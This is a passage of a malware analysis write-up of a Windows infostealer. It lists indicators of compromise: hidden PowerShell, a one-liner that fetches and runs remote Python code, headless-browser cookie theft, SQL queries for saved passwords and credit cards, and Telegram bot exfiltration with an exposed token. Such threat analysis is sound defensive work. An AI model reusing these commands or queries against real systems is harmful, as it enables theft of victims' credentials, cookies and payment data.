      "can_delete_stories": false,
      "is_anonymous": false,
      "can_manage_voice_chats": false
    },
    {
      "user": {
        "id": 1079398712,
        "is_bot": false,
        "first_name": ".",
        "username": "senju822222"
      },
      "status": "creator",
      "is_anonymous": false
    }
  ]
}

See also the article How We Were Able to Infiltrate Attacker Telegram Bots.

Process tree


Besides the traces seen on the machine, this sandbox also recorded other programs:

  1. csc.exe
  2. cvtres.exe

csc.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Csc | LOLBAS describes this program as the .NET Framework binary used to compile C# code.

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.cmdline"

aflg023p.cmdline is presumably a C# source file.

cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

It converts .res resource files into Common Object File Format (COFF) .obj object files, which the linker can link into the finished .exe PE application.
In other words, it turns resource files (.res) into compiled objects that can be linked with the linker.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1DB.tmp" "c:\Users\user\AppData\Local\Temp\aflg023p\CSCBA3711F82A4D46E8AC7D47C2390FF68.TMP"

These tools are commonly used for Living Off the Land Binaries And Scripts; for details of the attack technique see New Tool to Add to Your LOLBAS List: cvtres.exe - SANS Internet Storm Center.

aflg023p.cmdline

./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.dll" /debug- /optimize+ /warnaserror /optimize+  "C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.0.cs"

Lakatos, K#U00f6ves and Partners.bat

MalwareBazaar | Download malware samples
shows the same content as seen above.


Searching by the hash of this bat finds a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830 | Triage


The file name of the cmdline file keeps changing between runs.

Network

This report shows network activity: a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830 | Triage

but only DNS is recorded.


IoC

The following information covers only the characteristics observed in this malware and on the victim machine.

Attack commands

  1. powershell -ep bypass -w hidden -enc ZgB1AG4AYwB0....
  2. "C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"
  3. taskkill /F /IM browser.exe
  4. browser.exe --remote-debugging-port=9222 --restore-lastest-session --user-data-dir={path} --profile-directory={profile} --remote-allow-origins=* --headless --window-size=1,1 --disable-gpu --no-sandbox

Files accessed

  1. All_Passwords.txt
  2. login_db
  3. cards_db
  4. Temp[TW_某IP] 電腦名稱.zip
  5. Facebook_Cookies.txt
  6. profiles.ini
  7. logins.json
  8. key4.db
  9. cookies.sqlite
  10. Startup\WindowsSecurity.lnk
    • "C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"
  11. C:\Users\Public\ChromeApplication
    • DLLs\
    • Lib\
    • definitions.py
    • python310.dll
    • synaptics.exe(pythonw.exe 3.10.11)
    • vcruntime140.dll

Connected IPs or URLs

  1. http://localhost:9222/json
  2. https://api.telegram.org/bot{TOKEN_BOT}/sendDocument
    • 149.154.167.220:443
  3. http://ip-api.com/json/?fields=8195
    • 208.95.112.1:80
  4. .facebook.com
    • adsmanager
    • graph
    • mbasic
    • business
  5. https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint
    • 172.65.251.78:443

TG info

  1. TOKEN_BOT='7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI'
  2. CHAT_ID_NEW='-1002426006531'
  3. CHAT_ID_RESET='-1002489276039'
  4. https://t[.]me/Xmeta

sqlite query statements

  1. SELECT item1, item2 FROM metadata;
  2. SELECT a11, a102 FROM nssPrivate WHERE a102 = b'\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01';
  3. SELECT action_url, username_value, password_value FROM logins
  4. SELECT host, path, name, value, isSecure, isHttpOnly, expiry FROM moz_cookies
  5. SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards

headers = {
    'authority': 'adsmanager.facebook.com',
    'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'accept-language': 'vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5',
    'cache-control': 'max-age=0',
    'sec-ch-prefers-color-scheme': 'dark',
    'sec-ch-ua': '"Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"',
    'sec-ch-ua-full-version-list': '"Chromium";v="112.0.5615.140", "Google Chrome";v="112.0.5615.140", "Not:A-Brand";v="99.0.0.0"',
    'sec-ch-ua-mobile': '?0',
    'sec-ch-ua-platform': '"Windows"',
    'sec-ch-ua-platform-version': '"15.0.0"',
    'sec-fetch-dest': 'document',
    'sec-fetch-mode': 'navigate',
    'sec-fetch-site': 'same-origin',
    'sec-fetch-user': '?1',
    'upgrade-insecure-requests': '1',
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36',
    'viewport-width': '794',
}